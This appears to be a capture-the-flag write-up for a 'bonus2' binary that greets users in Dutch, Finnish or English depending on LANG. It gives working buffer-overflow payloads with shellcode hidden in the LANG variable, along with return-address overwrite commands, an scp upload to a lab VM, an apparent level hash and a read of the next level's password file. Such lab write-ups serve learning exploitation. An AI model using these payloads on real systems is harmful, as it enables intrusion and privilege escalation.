(more explanations in Ressources)

this time we have an exec that seem to greet the first and second arg using 3 different language based on the LANG env variable
(either greet in dutch, in finnish or in english by default)
tbh, we ended up chasing the wrong goose again, just like in bonus0 (see tests)
but in the end, thanks to an extra script (env.c), we managed to pass our payload in 2 parts:
one in the LANG (see source, only the first 2 bytes are used) after the language
the second is the second arg of bonus2 (the first arg is only of size 40 to get our second arg to be used)
(see source, tests, env.c, script.c, payload_asm.asm)

scp -P 4242 payload_b2 payload_fi payload_nl bonus2@192.168.56.102:/tmp
579bd19263eb8655e4cf7b742d75edf8c38226925d78db8163506f5191825245

export LANG=$(python -c "print 'fi\x68\x37\xff\xff\xbf\xb8\x5f\xb0\xe6\xb7\x40\xff\xd0\x31\xc0\x40\x31\xdb\xcd\x80/bin/sh -i'")
./bonus2 0123456789012345678901234567890123456789 $(python -c "print('B' * 18 + '\x23\xff\xff\xbf' + 'B' * (32 - 4 - 18))")
or
export LANG=$(python -c "print 'nl\x68\x37\xff\xff\xbf\xb8\x5f\xb0\xe6\xb7\x40\xff\xd0\x31\xc0\x40\x31\xdb\xcd\x80/bin/sh -i'")
./bonus2 0123456789012345678901234567890123456789 $(python -c "print('B' * 23 + '\x23\xff\xff\xbf' + 'B' * (32 - 4 - 23))")

cat /home/user/bonus3/.pass